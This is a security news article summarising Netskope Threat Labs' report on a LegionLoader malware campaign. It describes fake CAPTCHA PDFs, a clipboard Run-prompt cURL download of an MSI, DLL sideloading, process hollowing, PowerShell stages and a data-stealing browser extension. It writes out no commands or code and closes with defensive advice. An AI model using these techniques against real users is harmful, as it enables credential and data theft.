In a sophisticated phishing and malware campaign first detected in February 2025, threat actors are leveraging fake CAPTCHAs and Cloudflare Turnstile technology to deliver the LegionLoader malware.
Netskope Threat Labs has identified this campaign targeting unsuspecting victims searching for PDF documents on search engines, leading to the installation of malicious browser extensions designed to exfiltrate sensitive user data.
Infection Chain: Deceptive PDFs and Browser Notifications
The attack begins with victims searching for specific PDF documents. Upon visiting compromised websites, victims download PDF files containing fake CAPTCHAs.
When users interact with these CAPTCHAs, they are redirected through a Cloudflare Turnstile page and ultimately to a notification page.
The infection proceeds if the user enables browser notifications as prompted.
If the victim consents, a second CAPTCHA is displayed, followed by instructions directing the user to run a command from the clipboard via the Windows Run prompt.
This command executes a cURL utility to download a malicious MSI file. Victims opening this MSI file unwittingly deploy the initial payload.
The MSI file registers an innocuous-seeming application, “Kilo Verfair Tools,” embedding custom actions for executing malware.
As part of the deception, launching the application opens SumatraPDF, an open-source PDF reader, reinforcing the illusion of legitimacy.
Meanwhile, hidden processes extract and execute a malicious DLL file, “libcrypto-1_1-x64.dll,” which initiates the LegionLoader malware chain.
The DLL sideloading process decodes encrypted data containing shellcode and the LegionLoader payload.
A novel custom decryption algorithm is applied during the malware execution, utilizing dynamic keys and API obfuscation techniques to hinder analysis.
The malware employs API hammering for evasion and a technique known as process hollowing to inject the payload into an “explorer.exe” process.
Multi-Stage Payload Execution via PowerShell
Once executed, the LegionLoader payload establishes a connection with a command-and-control server, responding with a PowerShell command embedded with obfuscated decryption routines.
The deobfuscated script facilitates the download of additional payloads by dynamically constructing URLs after multiple layers of encryption and encoding.
The subsequent PowerShell stage installs a malicious browser extension named “Save to Google Drive,” mimicking a legitimate extension.
By terminating browser processes, modifying configurations, and enabling developer mode, the attackers ensure the extension’s deployment across multiple browsers such as Chrome, Edge, Brave, and Opera.
The malicious extension possesses extensive permissions, allowing it to intercept sensitive browser activities, including clipboard data, cookies, browsing history, and system details.
Additionally, the extension monitors Bitcoin-related activities, potentially targeting cryptocurrency transactions.
All collected data is exfiltrated to attacker-controlled servers, enhancing the perpetrators’ ability to exploit victims.
The campaign has targeted organizations across North America, Asia, and Southern Europe, with a focus on the technology and financial services sectors.
According to the Report, Netskope Threat Labs underscores the need for vigilance when accessing PDFs online.
Enterprises are advised to strengthen endpoint protection, enforce browser security policies, and educate users about the risks of enabling browser notifications.
This campaign highlights the growing sophistication of threat actors exploiting legitimate technologies, such as CAPTCHA systems and digitally-signed applications, to evade detection and deliver highly targeted payloads.
As Netskope continues monitoring LegionLoader activity, organizations are urged to remain alert to emerging attack vectors.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates
